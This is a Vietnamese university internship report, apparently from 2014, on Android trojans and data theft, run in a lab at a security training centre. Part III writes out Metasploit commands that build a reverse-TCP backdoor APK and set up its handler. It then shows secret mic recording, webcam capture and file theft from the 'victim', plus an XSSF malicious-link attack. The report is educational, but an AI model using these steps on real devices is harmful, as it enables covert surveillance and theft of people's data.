SlideShare a Scribd company logo
1 of 93
1 
ĐẠI HỌC QUỐC GIA TP HỒ CHÍ MINH 
TRƯỜNG ĐẠI KHOA HỌC TỰ NHIÊN 
KHOA ĐIỆN TỬ VIỄN THÔNG 
------ 
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ 
VÀ AN NINH MẠNG QUỐC TẾ 
ATHENA 
------ 
BÁO CÁO THỰC TẬP 
DOANH NGHIỆP 
ĐỀTÀI : NGHIÊN CỨU CÁC TROJAN, MALWARE 
CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH 
SÁCH LIÊN LẠC, TIN NHẮN TRÊN ĐIỆN THOẠI 
SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI 
Giáo viên hướng dẫn : THẦY VÕ ĐỖ THẮNG 
Sinh viên thực hiện : NGUYỄN VĂN THIÊN 
MSSV : 1120163 
TP HỒ CHÍ MINH, THÁNG 11 NĂM 2014
2 
NHẬN XÉT 
(Của giáo viên hướng dẫn ) 
......................................................................................................................................... 
......................................................................................................................................... 
......................................................................................................................................... 
......................................................................................................................................... 
......................................................................................................................................... 
......................................................................................................................................... 
......................................................................................................................................... 
......................................................................................................................................... 
......................................................................................................................................... 
......................................................................................................................................... 
......................................................................................................................................... 
......................................................................................................................................... 
......................................................................................................................................... 
......................................................................................................................................... 
......................................................................................................................................... 
......................................................................................................................................... 
......................................................................................................................................... 
.......................... , ngày …… tháng …… năm .......... 
Giáo viên hướng dẫn
3 
Hình ảnh chụp với giáo viên hướng dẫn thầy Võ Đỗ Thắng
4 
MỤC LỤC 
LỜI CẢM ƠN 
1 
MỞ ĐẦU 
2 
LỜI CAM KẾT 
3 
PHẦN I : TỔNG QUAN VỀ TRUNG TÂM 
I, Giới thiệu chung về Trung Tâm 
4 
II, Quá trình hình thành và phát triển 
4 
III, Cơ sở vật chất 
4 
IV, Đội ngũ giảng viên 
5 
V,Lĩnh vực hoạt động chính 
5 
VI, Dịch vụ hổ trợ 
6 
PHẦN II : THỐNG KÊ QUÁ TRÌNH THỰC TẬP 
I, Thời gian thực tập 
7 
II, Liệt kê nội dung thực tập 
7 
PHẦN III : NỘI DUNG THỰC TẬP CHI TIẾT 
I, Nghiên cứu cài đặt Kali trên máy ảo VMware 
1, Chuẩn bị 
9
5 
2, Cài đặt máy ảo 
10 
3, Cài đặt kali trên máy ảo 
15 
II, Tạo Applications chứa mã độc trên kali linux tấn công thiết bị Android. 
1, Tạo Applications chứa mã độc 
21 
2, Tiến hành khai thác dữ liệu 
26 
III, Tạo liên kết chứa mã độc trên kali và sử dụng tấn công thiết bị Android 
1, Tạo liên kết chứa mã độc 
31 
2, Tiến hành khai thác dữ liệu 
33
6 
IV, TỔNG QUAN VỀ ANDROID 
1, Giới thiệu 
37 
2, Đặc điểm 
39 
3, So sánh Android 2.x và 4.x 
40 
V, TẠO MÁY ẢO ANDROID TRÊN ECLIPSE 
1, Bộ Java SE Development Kit (JDK) 
43 
2, Eclipse IDE và Android SDK 
45 
3. Tích hợp Android SDK và Eclipse 
48 
VI, KẾT NỐI MÁY CHỦ ẢO VPS 
1, Giới thiệu máy chủ ảo VPS 
51 
2, Đặc điểm của VPS 51 
3, Giá trị khi sử dụng VPS 
52 
4, Kết nối VPS 
52 
VII, CÀI ĐẶT METASPLOIT TRÊN VPS 
1, Giới thiệu về phần mềm Metasploit 
53 
2, Giới thiệu payload Meterpreter 
53 
3, Cài đặt Metasploit 
54 
IIX, TẤN CÔNG MÁY ANDROID TỪ MÁY VPS
7 
1, Tạo ứng dụn chứa mã độc trên Kali lunix 
56 
2, Tấn công điện thoại Android 
56 
3, Các phuowg thức tấn công được sử dụng 
57 
PHỤ LỤC I : VIDEO QUÁ TRÌNH THỰC HIỆN 
62 
PHỤ LỤC II : DANH SÁCH BÁO CÁO QUÁ TRÌNH 
63 
PHỤ LỤC III : TÀI LIỆU THAM KHẢO 
64 
NHẬT KÝ THỰC TẬP 
PHIẾU KHẢO SÁT LẦN 1, LẦN 2, LẦN 3
8 
LỜI CẢM ƠN 
Trước hết em xin gửi lời cảm ơn và lòng biết ơn sâu sắc đến thầy Võ Đỗ 
Thắng, các thầy và anh chị trong Trung tâm ATHENA đã tận tình giúp đỡ, chỉ bảo 
và hướng dẫn em trong suốt thời gian thực tập. Trong suốt thời gian làm việc với 
thầy và trung tâm em không ngừng tiếp thu thêm nhiều kiến thức bổ ích mà còn học 
tập được tinh thần làm việc, thái độ nghiên cứu nghiêm túc, hiệu quả, chi tiết, và 
làm quan được với môi trường làm việc công nghiệp. Đây là những điều rất cần 
thiết cho em trong quá trình học tập và làm việc sau này. 
Em cũng xin gửi lời cảm ơn đến các thầy cô trong trường Đại học Khoa Học 
Tự Nhiên – TP Hồ Chí Minh nói chung và các thầy cô trong khoa Điện Tử Viễn 
Thông, bộ môn Máy tính – Hệ thống nhúng nói riêng đã tận tình giảng dạy, truyền 
đạt cho em những kiến thức, kinh nghiệm quý báu trong suốt bốn năm qua để em 
vững bước trên con đường học tập và công việc của mình sau này. 
Em xin chân thành cảm ơn văn phòng Athena tại 92 Nguyễn Đình Chiểu đã 
đã giúp em có được môi trường làm việc tốt nhất đồng thời cung cấp trang thiết bị 
giúp tôi có thể hoàn thành khóa thực tập này. 
Được sự giúp đỡ của Thầy và bạn bè, cùng với những nỗ lực của bản thân, 
em đã hoàn thành khóa thực tập doanh nghiệp đề tài “Nghiên cứu các Trojan, 
Malware cho phép đánh cắp dữ liệu trên thiết bị điện thoại sử dụng Android và gửi 
ra ngoài” xin kính trình Quý Thầy Cô xem xét và chấm điêm. Do trình độ nghiên 
cứu và thời gian có hạn, báo cáo của em chắc chắn không tránh khỏi có sự thiếu sót 
và hạn chế. Rất mong được sự góp ý và chỉ dẫn của Thầy cô. Em xin chân thành 
cảm ơn 
TP. Hồ Chí Minh, ngày 1 tháng 11 năm 2014 
Sinh viên 
Nguyễn Văn Thiên
9 
MỞ ĐẦU 
Khi bắt đầu tìm kiếm môi trường phù hợp cho việc thực tập, em đã đặt cho 
mình các mục tiêu sau: 
- Tiếp cận với môi trường doanh nghiệp để học cách làm việc của họ. 
- Nắm được quy trình phát triển phần mềm đang được áp dụng đồng thời tiếp 
cận được công nghệ mới. 
- Sử dụng được những kiến thức đã học trong 3 năm đầu. 
- Nhận được những kiến thức cần thiết cho công việc mà không được đề cập 
trên giảng đường. 
- Trau dồi các kỹ năng bản thân, nhất là kỹ năng làm việc nhóm và khả năng 
sử dụng tiếng Anh chuyên ngành. 
Xét thấy 5 mục tiêu trên là cần thiết với một sinh viên sắp rời khỏi ghế nhà 
trường, em cố gắng tìm kiêm một công ty, doanh nghiệp hay trung tâm có thể đáp 
ứng được mong muốn của mình. Sau một thời gian dài tìm hiểu và thăm dò qua bạn 
bè và người thân thấy “Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng 
Quốc Tế ATHENA” nhận sinh viên thực tập về các đề tài công nghệ di động, hệ 
điều hành di động Android mà em đang muốn tìm hiểu. Em quyết định nộp hồ sơ 
ứng tuyển vị trí thực tập sinh 2 tháng tại Trung tâm ATHENA, và đã được trung 
tâm nhận vào vị trí thực tập viên 2 tháng. 
Ngày 21/7/2014 em bắt đầu quá trình thực tập của mình ở trung tâm ATHENA.
10 
LỜI CAM KẾT 
Em xin cam kết: 
· Những nội dung trong báo cáo này là do em tự thực hiện với sự hướng dẫn 
của Thầy, cán bộ và các bạn tại Trung Tâm ATHENA. 
· Mọi tham khảo trong quá trình thực hiện báo cáo đều được trích dẫn rõ ràng 
về nguồn về nội dung, tác giả, địa chỉ tham khảo. 
· Nếu sao chép không hợp lệ, vi phạm quy chế đào tạo, hay gian lận, em xin 
chịu hoàn toàn trách nhiệm. 
TP. Hồ Chí Minh, ngày 01 tháng 11 năm 2014 
Sinh viên 
Nguyễn Văn Thiên
11 
PHẦN I : TỔNG QUAN VỀ TRUNG TÂM 
I.Giới thiệu chung về Trung Tâm 
+ Tên : Trung tâm đào tạo Quản trị mạng và An ninh mạng quốc tế Athena 
+ Địa chỉ : 
- Cơ sở 1 : 92 Nguyễn Đình Chiểu, phường Đa Kao, Q1,Tp.HCM 
- Cở sở 2 : 2 Bis Đinh Tiên Hoàng, phường Đa Kao, Q1,Tp.HCM 
+ Điện thoại : (08)38244041 
+ Email : support @athena.edu.vn & tuvan@athena.edu.vn 
+ Website : www.athena.edu.vn 
+ Logo : 
II. Quá trình hình thành và phát triển 
Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA 
được thành lập từ năm 2004, là một tổ chức qui tụ nhiều trí thức trẻ Việt Nam 
đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm 
huyết góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là 
ngành kinh tế mũi nhọn, góp phần phát triển nước nhà . 
III. Cơ sở vật chất 
-Thiết bị đầy đủ và hiện đại 
-Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những
12 
công nghệ mới nhất. 
-Phòng máy rộng rãi, thoáng mát 
IV. Đội ngũ giảng viên 
Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường 
đại học hàng đầu trong nước,... Tất cả giảng viên ATHENA đều phải có các 
chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH, có 
bằng sư phạm Quốc tế (Microsoft Certified Trainer). Đây là các chứng chỉ 
chuyên môn bắt buộc để đủ điều kiện tham gia giảng dạy tại trung tâm 
ATHENA. 
Bên cạnh đó,Các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến 
thức công nghệ mới từ các nước tiên tiến như Mỹ, Pháp, Hà Lan, Singapore,... 
và truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung 
tâm ATHENA. 
V. Lĩnh vực hoạt động chính 
Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu 
quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế 
của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song 
song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành 
riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , 
ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính.. 
Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã 
là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho 
nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công 
An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,.... 
Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình 
hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa 
Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện
13 
Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật 
Quân Sự
14 
VI. Dịch vụ hỗ trợ: 
- Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn. 
- Giới thiệu việc làm cho mọi học viên. 
- Thực tập có lương cho học viên khá giỏi. 
- Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không 
giới hạn thời gian. 
- Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy 
tính, mạng máy tính, bảo mật mạng. 
- Hỗ trợ thi Chứng chỉ Quốc tế...
15 
PHẦN II : THỐNG KÊ QUÁ TRÌNH THỰC TẬP 
I. Thời gian thực tập 
+ Thời gian bắt đầu : 24/07/2014 
+ Thời gian kết thúc : 03/11/2014 
+ Giờ lên trung tâm :7h30 đến 10h00 thứ 3,5,7 /tuần 
II. Liệt kê nội dung thực tập 
Thời gian Nội dung công việc 
Ngày 24/7/2014 - Gặp giáo viên hướng dẫn, nhận đề tài thực tập 
và tài liệu hướng dẫn. 
Tuần 1 
(24/7/2014 – 29/7/2014) 
- Cài đặt máy ảo Kali Linux trên phần mềm 
VMware workstation. 
- Nghiên cứu cơ chế tạo mã độc trên kali linux 
Tuần 2 
(31/7/2014 – 05/8/2014) 
- Thực hành tạo mã độc trên kali linux và tấn 
công thiết bị di động sử dụng hệ điều hành 
Android 
- Quay video giới thiệu bản thân 
Tuần 3 
(07/8/2014 – 14/8/2014) 
- Nghiên cứu tích hợp mã độc lên phần mềm 
- Thực hành tích hợp mã độc lên phần mềm 
- Nghiên cứu khai thác data trên smart phone 
Tuần 4 
(16/8/2014 – 23/8/2014) 
- Thực hành khai thác trên các thiết bị smart 
phone 
- Tấn công Android qua đường link liên kết mã 
độc nhờ XSSF 
Tuần 5 
(26/8/2014 – 04/9/2014) 
- Cài đặt Trojan qua ứng dụng iCalendar và 
iMatch 
Tuần 6-7 - Tìm hiểu máy chủ ảo VPS.
16 
(06/9/2014 – 20/8/2014) - Tìm hiểu phần mềm Metasploit. 
- Cài đặt Metasploit trên máy chủ ảo VPS. 
Tuần 8 
(22/9/2014 – 28/9/2014) 
- Cài đặt Metasploit trên máy chủ ảo VPS 
- Tham gia học và thi khóa học system hacking 
Tuần 9 
(30/9/2014 – 5/10/2014) 
- Nghiên cứu việc tấn công vào điện thoại 
Android thật từ máy chủ ảo VPS. 
- Thực hành tấn công vào điện thoại Android từ 
máy chủ ảo VPS 
Tuần 10 
(6/10/2014 – 12/10/2014) 
- Tổng hợp và làm báo cáo tổng kết 
3/11/2014 - Báo cáo tổng kết
17 
PHẦN III : NỘI DUNG THỰC TẬP CHI TIẾT 
I. Nghiên cứu cài đặt Kali Linux trên máy ảo VMware. 
1, Chuẩn bị 
· Phần mềm VMware : Hiện nay phần mềm tạo máy ảo là một phần mềm 
được sử dụng rộng rãi. Ở bài báo cáo này mình cũng sử dụng VMware để tạo 
máy ảo. Các bạn cần download là tiến hành cài đặt phần mềm này. Ở đây 
mình sẽ không giới thiệu kỹ về phần này. 
Hướng dẫn cụ thể các bạn có thể tham khảo tại: 
https://www.youtube.com/watch?v=43O5Glide5M 
· Tải về file ISO phiên bản mới nhất của phần mềm Kali Linux. Các bạn có 
thể tải tại địa chỉ sau: 
http://www.kali.org/downloads 
Ta chọn thư mục để lưu. Các bạn cần nhớ thư mục mà các bạn chọn lưu này, vì
18 
lúc cài ta sẽ sử dụng nó. Sau khi tải về ta sẽ có File ISO như sau. 
2, Cài đặt 
Sau khi đã có phần mềm VMware và file ISO của kali ta tiến hành cài đặt Kali trên 
máy ảo. 
B1: Tiến hành mở VNware và tạo máy ảo mới 
Sau đó chọn chế độ Custom và next
19
20 
B2: Chọn file ISO của kali đã download trước đó bằng cách chọn đường dẫn đến 
thu mục đã lưu. Sau đó tiếp tục.
21 
B3: Chọn hệ điều hành. Chọn Linux->Debian 7 64bit, sau đó next
22 
B4: Đặt tên cho máy ảo và, nơi lưu. Ở đây mình đặt tên cho may ảo là MayAo1, lưu 
tại địa chỉ mặc đinh, các bạn cũng có thể chọn nơi lưu khác.
23 
B5: Cài đặt các thông số bộ nhớ 
Tùy theo cấu hình của máy thật mà các bạn chọn dung lượng bộ nhớ cho máy ảo. Ở 
đây máy mình dung lượng là 4Gb, mình sẽ chon dung lượng cho máy ảo là 1Gb. 
Sau đó next
24 
B6: Chọn chế độ Network 
Chọn LSI Logic -> next, sau đó chọn SCSI -> next
25
26 
Chọn Create a new virtual disk -> next -> next 
Tiếp tục next cho đến khi Finish
27 
Đến đây ra đã tạo xong máy ảo. Tiến hành cài đặt kali trên máy ảo.
28 
3, Cài đặt kali trên máy ảo 
B1: Khởi động máy ảo đã tạo. Chọn Graphic Install 
Sau đó chọn ngôn ngữ máy sử dụng. 
Sau đó máy ảo sẽ tiến hành cài đặt.
29
30 
B2: Đặt tên Host name và Domain name 
Sau đó đặt passwords
31 
B3: Sau đó tiếp tục Continue cho đến khi xuất hiện câu hỏi Yes/No. Ta chọn Yes. 
Sau đó chờ khoản 20 phút
32 
B4 :Sau khi cài đặt xong, chọn No ở Network mirror, chọn Yes ở phần Boot-loader. 
Sau đó tiếp tục, hệ thống tự reboot lại.
33 
B5: Đăng nhập 
Sau khi cài đặt xong, ta khởi động lại máy ảo, Phần urse ta nhập root. 
Sau đo nhập mật khảu mà ta đã đặt ở quá trình trước
34
35 
Sau khi đăng nhập thành công, giao diện máy ảo xuất hiện. 
Vậy là ta đã hoàn thành quá trình cài đặt Kali Linux trên Máy ảo được tạo từ 
VMware.
36
37 
II. Tạo Applications chứa mã độc trên kali linux và sử dụng để tấn công thiết 
bị Android. 
1, Tạo Applications chứa mã độc 
Ta sẽ sử dụng Metasploit framework trên Kali linux để tạo một payload, khi 
các thiết bị android download và cài đặt payload này lên thiết bị thì chúng ta có thể 
xâm nhập để khi thác dữ liệu cũng như điều khiển thiết bị này. 
Ở đây chúng ta sử dụng Kali linux trên VMware. 
Trước tiên ta cần thiết lập Netwwork trên VMware. Vào VM -> setting… 
Chọn thiết lập như hình
38
39 
Sau đó vào Edit -> Virtual Network Editor... 
Trên phần Bridge (connect VMs directly to the external network) ta sẽ chọn adapter 
của máy thật mà ta đang sử dụng. 
Sau khi thiết lập hoàn tất trên VNware ta tiến hành mở máy Kali linux đã được tạo 
trước đó và tiến hành tạo file mã độc. 
Sau khi khởi động máy ảo Kali linux ta tiến hành mở cửa sổ terminal và kiểm tra 
IP của máy ảo bằng lệnh ifconfig.
40 
Như hình ta thấy IP của máy ảo ở đây là 192.168.85.128 
Sau đó gõ dòng lệnh sau: 
msfpayload android/meterpreter/reverse_tcp lhost=192.168.85.128 lport=8080 
R > /root/Desktop/madoc.apk 
Lưu ý địa chỉ IP trong dòng lệnh trên là IP của máy ảo Kali ( địa chỉ mà chúng ta có 
trước đó ). 
Còn 8080 là số port, ta có thể sử dụng một số khác nhưng không nên chọn các port 
hay dùng.
41 
Sau khi thực hiện câu lệnh trên hệ thông sẽ tạo một file madoc.apk trên desktop 
của máy ảo, đây chính là một Metasploit reverse tcp backdoor. 
Sau đó quay lại cửa sổ terminal nhập lệnh mfsconsole và chờ câu lệnh load xong 
như hình sau.
42 
Sau đó ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ các lệnh sau: 
use exploit/multi/handler 
set payload android/meterpreter/reverse_tcp 
set lhost 192.168.85.128 – nhập địa chỉ IP giống với khi tạo payload ở trên. 
set lport 8080– nhập port giống với port khi tạo payload ở trên. 
Exploit 
Sau khi nhập xong các câu lệnh trên màn hình sẽ xó dạng như sau: 
Lúc này ta đang chờ thiết bị android muốn xâm nhập mở backdoor. 
Vậy là chúng ta đã tạo xong mã độc để xâm nhập android.
43 
2, Tiến hành khai thác dữ liệu thông qua Applications chứa mã độc 
Khi máy android cài đặt và chạy ứng dụng chứa mã độc thì xuất hiện giao diện như 
sau, nếu ra nhấn vào Reverse TCP có nghĩ là máy android mà máy chủ kali lunix đã 
được kết nối với nhau 
Khi đó trên Kali ta nhận được thông báo có thiết bị truy cập vào làm nạn nhân.
44 
Dùng lệnh “help” để liệt kê các lệnh mà ta có thể thực hiện được. 
2.1, Khai thác thông tin hê thống: 
Xem thông tin hệ thống bằng lệnh “sysinfo”.
45
46 
2.2, Ghi âm lén: 
Ghi âm lén ở thiết bị nạn nhân Android và lưu về máy tấn công Kali bằng lệnh 
“record_mic”. 
File ghi âm được là xLijsRbg.wav lưu tự động ở /root của máy Kali. 
2.3, Khai thác webcam và chụp ảnh lén: 
Kiểm tra danh sách webcam của thiết bị nạn nhân Android và thực hiện chụp 
ảnh lén, lưu về máy tấn công Kali bằng lệnh “webcam_list” và “webcam_snap 
<mã webcam>”.
47 
File ảnh chụp được là FRumITki.jpeg lưu tự động ở /root của máy Kali 
. 
2.4, Khai thác file hệ thống của máy nạn nhân: 
Kiểm tra các file hệ thống đang hoạt động bằng lệnh “ps”.
48 
2.5, Khai thác dữ liệu từ SDCARD: 
Di chuyển vào bộ nhớ SDCARD bằng lệnh “cd /sdcard”. 
Dùng lệnh “ls” để liệt kê danh sách các thư mục/tập tin có trong SDCARD. 
Xem các tập tin mà máy nạn nhân đã tải về qua lệnh di chuyển thư muc “cd 
Download” và lệnh liệt kê “ls”.
49 
Đánh cắp và tải về tập tin bất kì bằng lệnh “download <tên tập tin>”. 
Ở đây dùng lệnh “download appsX.apk”. 
Tập tin appsX.apk vừa đánh cắp về được lưu tự động trong /root của máy tấn 
công Kali. 
2.6, Kết thúc tấn công: 
Dùng lệnh “exit” để thoát khỏi Metasploit và kết thúc quá trình tấn công.
50 
III. Tạo liên kết chứa mã độc trên kali linux và sử dụng để tấn công thiết bị 
Android 
1, Tạo Liên kết chứa mã độc 
Bước 1: Khởi động máy tấn công Kali Linux và thiết bị nạn nhân Android. 
Bước 2: Ở máy Kali > Mở Terminal > thực hiện 3 lệnh sau để cập nhật 
Framework 
“msfupdate” 
“cd /opt/metasploit/apps/pro/msf3” 
“svn export http://xssf.googlecode.com/svn/trunk/ ./ --force” 
Bước 3: Khởi động Metasploit bằng lệnh “msfconsole” 
Bước 4: Vào XSSF bằng lệnh “load xssf Port=80 Uri=/xssf/ Public=true 
Mode=Verbose”
51
52 
Bước 5: Thực hiện lệnh “xssf_urls” 
Ta nhận được các urls (đường dẫn web http) như của XSSF Server, XSSF test 
page, XSSF logs page… 
Bước 6: Cho máy nạn nhân truy cập vào đường dẫn XSSF test page: 
http://192.168.149.136:80/xssf/test.html
53 
2, Tiến hành khai thác dữ liệu thông qua Liên kết chứa mã độc 
Khi máy nạn nhân truy cập vào địa chỉ có chứa mã độc thì máy nạn nhân và máy 
chủ kali lunix được kết nối với nhau 
Khi đó ở máy chủ Kali sẽ có thông báo là có một máy nạn nhân 
2.1, Kiểm tra số lượng nạn nhân đang truy cập vào đường dẫn mã độc: 
Ta dùng lệnh “xssf_victims” để kiểm tra số lượng nạn nhân truy cập vào đường dẫn 
mã độc http://192.168.149.136:80/xssf/test.html
54 
2.2, Xem thông tin về nạn nhân đang truy cập: 
Dùng lệnh “xssf_information <ID máy nạn nhân>” 
Ở đây ví dụ là “xssf_information 1” 
2.3, Khai thác dữ liệu từ máy nạn nhân: 
· Đầu tiên ta dùng lệnh “search auxiliary/xssf” để kiểm tra các quyền mà ta có 
thể thao tác lên máy nạn nhân
55 
· Gửi Thông báo XSSF đến máy nạn nhân qua lệnh: 
“use auxiliary/xssf/public/misc/alert” 
“run” 
Ở máy nạn nhân sẽ nhận được cảnh báo XSSF
56 
Thoát ra msf bằng lệnh “Ctrl+C” > “back” 
· Kiểm tra xem nạn nhân có truy cập vào các trang web thông dụng hay không 
bằng lệnh: 
“use auxiliary/xssf/public/misc/visited_pages” 
“run” 
· Cài đặt 1 đường dẫn mới và qua đó kiểm tra thông tin máy nạn nhân lần nữa: 
“use auxiliary/gather/android_htmlfileprovider” 
“set SRVPORT 87” 
“set URIPATH /” 
“run”
57 
Chờ nạn nhân truy cập vào đường dẫn mới http://192.168.149.136:87/ 
Ta nhận được thông tin máy nạn nhân: 
2.4, Thoát khỏi XSSF của Metasploit: 
Để thoát khỏi ta thực hiện các lệnh: “Ctrl + C” > “back” > “exit” > “exit”
58 
IV. TỔNG QUAN VỀ ANDROID 
1. Giới thiệu: 
- Tổng công ty Android (Android, Inc.) được thành lập tại Palo Alto, California 
vào tháng 10 năm 2003 bởi Andy Rubin (đồng sáng lập công ty Danger), Rich 
Miner (đồng sáng lập Tổng công ty Viễn thông Wildfire), Nick Sears (từng là Phó 
giám đốc T-Mobile), và Chris White (trưởng thiết kế và giao diện tại WebTV) để 
phát triển, theo lời của Rubin, "các thiết bị di động thông minh hơn có thể biết được 
vị trí và sở thích của người dùng". Dù những người thành lập và nhân viên đều là 
những người có tiếng tăm, Tổng công ty Android hoạt động một cách âm thầm, chỉ 
tiết lộ rằng họ đang làm phần mềm dành cho điện thoại di động. Trong năm đó, 
Rubin hết kinh phí. Steve Perlman, một người bạn thân của Rubin, mang cho ông 
10.000 USD tiền mặt nhưng từ chối tham gia vào công ty. 
- Google mua lại Tổng công ty Android vào ngày 17 tháng 8 năm 2005, biến nó 
thành một bộ phận trực thuộc Google. Những nhân viên của chủ chốt của Tổng 
công ty Android, gồm Rubin, Miner và White, vẫn tiếp tục ở lại công ty làm việc 
sau thương vụ này. Vào thời điểm đó không có nhiều thông tin về Tổng công ty, 
nhưng nhiều người đồn đoán rằng Google dự tính tham gia thị trường điện thoại di 
động sau bước đi này. Tại Google, nhóm do Rubin đứng đầu đã phát triển một nền 
tảng thiết bị di động phát triển trên nền nhân Linux. Google quảng bá nền tảng này 
cho các nhà sản xuất điện thoại và các nhà mạng với lời hứa sẽ cung cấp một hệ 
thống uyển chuyển và có khả năng nâng cấp. Google đã liên hệ với hàng loạt hãng 
phần cứng cũng như đối tác phần mềm, bắn tin cho các nhà mạng rằng họ sẵn sàng 
hợp tác với các cấp độ khác nhau. 
- Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trường điện thoại di động 
xuất hiện trong tháng 12 năm 2006. Tin tức của BBC và Nhật báo phố Wall chú 
thích rằng Google muốn đưa công nghệ tìm kiếm và các ứng dụng của họ vào điện 
thoại di động và họ đang nỗ lực làm việc để thực hiện điều này. Các phương tiện 
truyền thông truyền thống lẫn online cũng viết về tin đồn rằng Google đang phát 
triển một thiết bị cầm tay mang thương hiệu Google. Một vài tờ báo còn nói rằng
59 
trong khi Google vẫn đang thực hiện những bản mô tả kỹ thuật chi tiết, họ đã trình 
diễn sản phẩm mẫu cho các nhà sản xuất điện thoại di động và nhà mạng. Tháng 9 
năm 2007, InformationWeek đăng tải một nghiên cứu của Evalueserve cho biết 
Google đã nộp một số đơn xin cấp bằng sáng chế trong lĩnh vực điện thoại di động. 
- Ngày 5/11/2007, Liên minh thiết bị cầm tay mở (Open Handset Alliance), một 
hiệp hội bao gồm nhiều công ty trong đó có Texas Instruments, Tập đoàn 
Broadcom, Google, HTC, Intel, LG, Tập đoàn MarvellTechnology, Motorola, 
Nvidia, Qualcomm, Samsung Electronics, Sprint Nextel và T-Mobile được thành 
lập với mục đích phát triển các tiêu chuẩn mở cho thiết bị di động. Cùng ngày, 
Android cũng được ra mắt với vai trò là sản phẩm đầu tiên của Liên minh, một nền 
tảng thiết bị di động được xây dựng trên nhân Linux phiên bản 2.6. Chiếc điện 
thoại chạy Android đầu tiên được bán ra là HTC Dream, phát hành ngày 22 tháng 
10 năm 2008. Biểu tượng của hệ điều hành Android mới là một con rôbốt màu 
xanh lá cây do hãng thiết kế Irina Blok tại California vẽ. 
- Từ năm 2008, Android đã trải qua nhiều lần cập nhật để dần dần cải tiến hệ điều 
hành, bổ sung các tính năng mới và sửa các lỗi trong những lần phát hành trước. 
Mỗi bản nâng cấp được đặt tên lần lượt theo thứ tự bảng chữ cái, theo tên của một 
món ăn tráng miệng; ví dụ như phiên bản 1.5 Cupcake (bánh bông lan nhỏ có kem) 
tiếp nối bằng phiên bản 1.6 Donut (bánh vòng). Phiên bản mới nhất là 4.2 Jelly 
Bean (kẹo dẻo). Vào năm 2010, Google ra mắt loạt thiết bị Nexus - một dòng sản 
phẩm bao gồm điện thoại thông minh và máy tính bảng chạy hệ điều hành Android, 
do các đối tác phần cứng sản xuất. HTC đã hợp tác với Google trong chiếc điện 
thoại thông minh Nexus đầu tiên, Nexus One. Kể từ đó nhiều thiết bị mới hơn đã 
gia nhập vào dòng sản phẩm này, như điện thoại Nexus 4 và máy tính bảng Nexus 
10, lần lượt do LG và Samsung sản xuất. Google xem điện thoại và máy tính bảng 
Nexus là những thiết bị Android chủ lực của mình, với những tính năng phần cứng 
và phần mềm mới nhất của Android.
60 
2. Đặc điểm: 
- Tính mở: Android được xây dựng từ dưới đi lên cho phép người phát triển tạo 
các ứng dụng di động hấp dẫn với đầy đủ các điểm mạnh của các thiết bị cầm tay 
hiện có. Android hoàn toàn mở, một ứng dụng có thể gọi tới bất kể một chức năng 
lõi của điện thoại như tạo cuộc gọi, gửi tin nhắn hay sử dụng máy ảnh, cho phép 
người phát triển tạo phong phú hơn, liên kết hơn các tính năng cho người dùng. 
Android được xây dựng trên nhân Linux mở. Thêm nữa, nó sử dụng một máy ảo mà 
đã được tối ưu hóa bộ nhớ và phần cứng với môi trường di động. Android mà một 
mã nguồn mở, nó có thể được mở rộng để kết hợp tự do giữa các công nghệ nổi trội. 
Nền tảng này sẽ tiếp tục phát triển bởi cộng đồng phát triển để tạo ra các ứng dụng 
di động hoàn hảo. 
- Tính ngang bằng của các ứng dụng: 
Với Android, không có sự khác nhau giữa các ứng dụng điện thoại cơ bản với ứng 
dụng của bên thứ ba. Chúng được xây dựng để truy cập như nhau tới một loạt các 
ứng dụng và dịch vụ của điện thoại. Với các thiết bị được xây dựng trên nền tảng 
Android, người dùng có thể đáp ứng đầy đủ các nhu cầu mà họ thích. Chúng ta có 
thể đổi màn hình nền, kiểu gọi điện thoại, hay bất kể ứng dụng nào. Chúng ta thậm 
chí có thể hướng dẫn điện thoại chỉ xem những ảnh mình thích. 
- Phá vỡ rào cản phát triển ứng dụng: 
Android phá vỡ rào cản để tạo ứng dụng mới và cải tiến. Một người phát triển có 
thể kết hợp thông tin từ trang web với dữ liệu trên điện thoại cá nhân – chẳng hạn 
như danh bạ, lịch hay vị trí trên bản đồ – để cung cấp chính xác hơn cho người 
khác. Với Android, người phát triển có thể xây dựng một ứng dụng mà cho phép 
người dùng xem vị trí của những người bạn và thông báo khi họ đang ở vị trí lân 
cận. Tất cả được lập trình dễ dàng thông qua sự hỗ trợ của MapView và dịch vụ 
định vị toàn cầu GPS. 
- Xây dựng ứng dụng dễ dàng và nhanh chóng: 
Android cung cấp bộ thư viện giao diện lập trình ứng dụng đồ sộ và các công cụ để 
